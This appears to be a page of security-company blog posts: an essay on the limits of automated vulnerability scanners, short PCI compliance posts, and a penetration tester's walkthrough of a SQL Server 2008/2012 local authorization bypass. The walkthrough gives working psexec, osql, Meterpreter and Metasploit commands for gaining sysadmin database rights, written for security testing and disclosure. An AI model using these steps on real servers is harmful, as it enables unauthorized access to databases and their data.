A False Sense of Security

I have worked for and with technology-focused companies for the past 15 years. I’m a huge believer that technological advances (or even just new ways of using existing technology) are making our lives demonstrably better. There are stops and starts along the way, but as a society, we are using technology to improve our businesses and our lives. I truly believe this.

But I also believe that we, at times, rely on ‘technology’ as our savior. It fixes all problems, it solves all puzzles. Everything that we don’t really understand (but have been forced to address either at work or in life) seems like it can be dealt with by some technical product. This view is supported by the fact that, in the world of IT at least, a technical product does exist for almost anything for which there is even the perception of a need.

This is especially true when you are talking about a discipline like information security. Infrastructure design and configuration, application security, regulatory compliance, policy development, privacy, disaster recovery, database security, vendor management… all of these areas might fall under ‘information security’. At the very least, those in charge of information security have some input into all of these areas. There’s a lot to know, or at least understand, here, and many professionals within our community are asked to overreach their personal knowledge bank on a daily basis in order to address a need of the business.

Beyond the complexity of the required knowledge, there is also a well-understood desire for standardization and progress. This is especially true if you are working for large, politically complex organizations. If you are working with disparate groups or product/program managers that are under a lot of time pressure and working with a defined budget, you want to present a ‘solution’ that is standardized, well-structured, easily understood, and represents progress for the security program. Even if it’s not everything that should be done.
Ultimately, it may be more effective to get something in place that becomes an accepted practice, even if it’s not perfect. I’ve been thinking quite a bit about this over the last couple of weeks.

Several large organizations have recently come to NetSPI and asked us to re-assess environments and applications that were recently assessed as part of their standard internal process (which involved entirely automated tools and assessment-on-demand type services). They came to us because someone on the internal security team was concerned that they were falsely assuming all was well after ‘clean’ results from these expensive technology solutions. Sadly, we were not able to provide them with any assurance – in each case our team identified vulnerabilities that were critical in nature and provided administrator access to apparently ‘secure’ environments and applications. These vulnerabilities were not zero-day issues – in some cases they weren’t even hard to identify. In two instances, the technologies used in the solution being reviewed simply weren’t supported by the on-demand assessment service that was utilized as part of their internal process (not that our client was informed of this by the vendor). At the end of the day, the fully automated and on-demand assessment solutions just didn’t find critical issues that our clients needed to know about in order to reduce risk.

My point in relating this information isn’t to bash the use of technology or automated solutions in assessing technical security. Automation is a key part in making security more efficient, and standardization helps to promote adoption and understanding internally – both good things. My point is to recognize that technology isn’t perfect, and information security has characteristics that make putting all of your assessment ‘eggs’ in a single basket provided by an automation vendor a very risky proposition for an organization that is actually looking to manage risk and exposure effectively.
A recent study (Performance of automated network vulnerability scanning at remediating security issues) that looked at the performance of automated network vulnerability scanners found that, across the breadth of tools tested, only slightly more than half of the vulnerabilities known to exist in the test environment were identified (and remediation guidelines presented) by the tools in the study. (As a side note, the same study hits the tools pretty hard on the usefulness of the reporting that is generated – something that we’ve had issues with for years and why we created our own reporting structure and content as part of CorrelatedVM™.) An interesting quote in regard to vulnerability scanning with the automated tools: ‘…there are issues with the method: manual effort is needed to reach complete accuracy and the remediation guidelines are oftentimes very cumbersome to study.’ This certainly supports NetSPI’s approach and the methodology that we follow with clients.

While this study was focused specifically on leading network vulnerability scanning tools, another study (Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners) found a very similar situation with web vulnerability scanners. The researchers in this case found that while certain kinds of vulnerabilities are found quite effectively, ‘there are whole classes of vulnerabilities that are not well-understood and cannot be detected by any of the scanners.’ (their emphasis)

My point in all of this is that automated vulnerability scanning is certainly useful and, with large environments or applications, absolutely necessary (we use some of these tools in our assessment process), but don’t be lulled into a false sense of security. If this is all that you are doing to identify and address potential vulnerabilities within your network or critical application environments, then you have a problem.

Alex Crittenden


SQL Server Local Authorization Bypass

Unlike previous versions, SQL Server 2008 and 2012 don’t provide local system administrators with database administrator rights by default. This was a great idea by Microsoft to reinforce the practices of least privilege and separation of duties. However, while their heart was in the right place, the restriction was implemented in such a way that any local administrator (or attacker) can bypass it. In most environments SQL Server 2008 and 2012 are installed on domain member servers and access is managed via domain groups. As a penetration tester, that means once I obtain Domain Admin privileges I can simply add myself to the database admin groups in Active Directory to get access. Once in a while I run across a SQL Server instance that is not managed via domain groups or is not on the domain at all. That’s when the escalation method covered in this blog can be useful.

Vulnerability Overview

When SQL Server 2008 is installed, the “NT AUTHORITY\SYSTEM” account and the SQL Server service account are added to the “sysadmin” fixed server role by default. The “sysadmin” fixed server role is essentially the database administrators group. Any account that has been assigned the role will have complete control over the SQL Server and the associated data. Local administrators can obtain “sysadmin” privileges in two easy steps:

  1. Use psexec to obtain a cmd.exe console running as “NT AUTHORITY\SYSTEM”.
  2. Use osql and a trusted connection to connect to the local database with “sysadmin” privileges.
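The two steps above can be sketched as a single sequence run from an elevated command prompt. This is a sketch, not a tested script: the instance name “localhost\sqlexpress” assumes a default SQL Server Express install, and psexec must be in your path.

```batch
REM Step 1: spawn a cmd.exe console running as NT AUTHORITY\SYSTEM.
REM The -s switch tells psexec to run the command as the SYSTEM account.
psexec -s cmd.exe

REM Step 2 (typed inside the new SYSTEM console): connect with a trusted
REM connection; -E authenticates as the current user, which is now SYSTEM.
osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"
```

If the second command returns 1, the SYSTEM console is being treated as a member of the “sysadmin” fixed server role.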

In SQL Server 2012, “NT AUTHORITY\SYSTEM” no longer has sysadmin privileges by default, but this restriction can be overcome by migrating to the SQL Server service process.
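For the SQL Server 2012 case, the idea is to run your trusted connection from inside the SQL Server service process instead of as SYSTEM. A minimal Meterpreter session sketch is below; the process name is real, but the PID and output are hypothetical and will differ in your environment:

```
meterpreter > ps
 ...  1234  sqlservr.exe  ...
meterpreter > migrate 1234
meterpreter > shell
C:\> osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"
```

Because the connection now authenticates as the SQL Server service account, which is a sysadmin by default, the query should come back as 1.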

Attack Walkthrough

For those of you who want to test out the attack at home you can follow the steps below.

  1. Install SQL Server 2008 Express. Click. Click. Click. It can be downloaded from Microsoft at
  2. Log into the Windows server as a local administrator that has not been assigned the “sysadmin” fixed server role.
  3. Run the following SQL query against the local server to check if the current user has been assigned the “sysadmin” fixed server role:

     osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"

     The -E switch authenticates to the SQL Server as the current user and does not require a password. The -S switch specifies the SQL Server instance. The query “select is_srvrolemember(‘sysadmin’)” will return a 1 if you have been assigned the “sysadmin” fixed server role, and a 0 if you haven’t.

    Note: In some cases, the local administrator or the local administrators group is added to the “sysadmin” role manually during the installation process. I don’t believe that’s what Microsoft intended, but it happens a lot nonetheless. If that’s the case, this escalation process will not be necessary.

  4. Download psexec. It’s part of the Sysinternals tool set and can be downloaded from Microsoft at:
  5. Type the following command to obtain an “NT AUTHORITY\SYSTEM” console with psexec:

     psexec -s cmd.exe

     Note: The -s switch tells psexec to run cmd.exe as “NT AUTHORITY\SYSTEM”. It does this by creating a new service and configuring it to run as “NT AUTHORITY\SYSTEM”.
  6. Type one of the following commands to verify that you are running as “NT AUTHORITY\SYSTEM”:

     whoami
     echo %username%
  7. Now run the same osql query as before to verify that you have “sysadmin” privileges. This time you should get a 1 back instead of a 0.

     osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"
  8. If you prefer a GUI tool, you can also run Management Studio Express as shown in the screenshots below.
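As a related check, you can enumerate who already holds the role before and after the escalation. This is a sketch using the standard SQL Server 2008 catalog views; run it the same way as the osql queries above:

```sql
-- List all current members of the sysadmin fixed server role
SELECT p.name AS member_name, p.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals p ON rm.member_principal_id = p.principal_id
WHERE r.name = 'sysadmin';
```

After step 7 you should see “NT AUTHORITY\SYSTEM” (and the SQL Server service account) in the results.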

Wrap Up

To streamline the process a little bit, I recently created a Metasploit post module that will escalate privileges and add a sysadmin to the target SQL Server via an existing Meterpreter session. That module can be downloaded from my GitHub account for those who are interested:

In spite of how easy it is to use this method to gain unauthorized access to databases, it appears to be a requirement in SQL Server 2008. At least one Microsoft article stated, “Do not delete this account or remove it from the SYSADMIN fixed server role. The NT AUTHORITY\SYSTEM account is used by Microsoft Update and by Microsoft SMS to apply service packs and hotfixes…”. So in some cases this boils down to missing patches vs. excessive privileges from a risk perspective. My guess is that most companies are going to want to keep their servers patched. 🙂 Regardless, hopefully this blog was informative and useful. As always, have fun, but hack responsibly.
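For reference, running the post module from msfconsole looks roughly like the following. This is a sketch from memory: the module path and option names may differ slightly by framework version, and the session number and credentials are hypothetical:

```
msf > use post/windows/manage/mssql_local_auth_bypass
msf post(mssql_local_auth_bypass) > set SESSION 1
msf post(mssql_local_auth_bypass) > set DB_USERNAME mysysadmin
msf post(mssql_local_auth_bypass) > set DB_PASSWORD MyPassword1!
msf post(mssql_local_auth_bypass) > run
```

Under the hood it performs the same impersonation described above (SYSTEM on 2008, service-process migration on 2012) and then adds the specified sysadmin login.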



PA-DSS vendors now have training options

During PA-DSS audits, NetSPI is often asked about what training options payment application vendors have for developers. These questions are in reference to PA-DSS requirement 5.2.a, which states: “Obtain and review software development processes for payment applications (internal and external, and including web-administrative access to product). Verify the process includes training in secure coding techniques for developers, based on industry best practices and guidance.”

The PCI Council is working with SANS on a set of courses that PA-DSS vendors can use. These courses include fundamental courses for developers and security staff as well as development-language-specific courses. There are also courses for senior-level developers, testers, and managers. An example of one of the courses is Secure Coding for PCI Compliance. This is a two-day course on the OWASP Top Ten issues and is for developers with experience in one of the following languages: Perl, PHP, C, C++, Java, or Ruby.

If you are a payment application vendor needing to start or enhance your training, look at the SANS web site – these should help you get through requirement 5.2.a. Please note, NetSPI is not associated with SANS in any way.


Filling the Void – QIR Program

The PCI Council recently announced a new certification program called the Qualified Integrators and Resellers (QIR) Program. In my opinion, this fills a gap that has existed for specific environments and that typically reflects negatively on merchants or service providers that purchase off-the-shelf payment application solutions.

Using a PA-DSS validated payment application is a requirement for merchants, as is using it in a PCI-DSS compliant manner. However, an issue appears when resellers or integrators are not fully aware of how their implementation plan and methods impact the merchant – the entity ultimately responsible for compliance. The issue then manifests during a QSA-led assessment when it is discovered that the system was not implemented properly per the Implementation Guide (segmentation efforts were negated, etc.). As a QSA, this is a hard conversation to have with my clients, especially since it usually means a non-compliant assessment and the merchant has to spend additional time or resources to resolve the issue.

Now, I understand that this certification program is not going to solve everything, but having integrators and resellers that are trained similarly to PA-QSAs and QSAs just helps everyone involved in the process to be on the same playing field. This results in the merchants and service providers reaping the largest slice of Benefit Pie.

Questions will come up about whether this program will be worth it, or whether it is going to last, since all indications lean towards the program being voluntary. While I get that the PCI Council’s official list of certified integrators and resellers may not be the first place merchants or service providers go when selecting their next Point of Sale (POS) system (application features versus a QIR-certified reseller), they can insist that the POS vendor use QIR-certified integrators, since in the end it is the merchant or service provider’s compliance status on the line.
While information is still a little scarce since the program has not been rolled out just yet, more on the QIR Program can be found on the PCI Council’s QIR program site. The Council will also be hosting a webinar on August 16 and again on August 29. Additional information can be found on the PCI Council’s Training Webinar page.
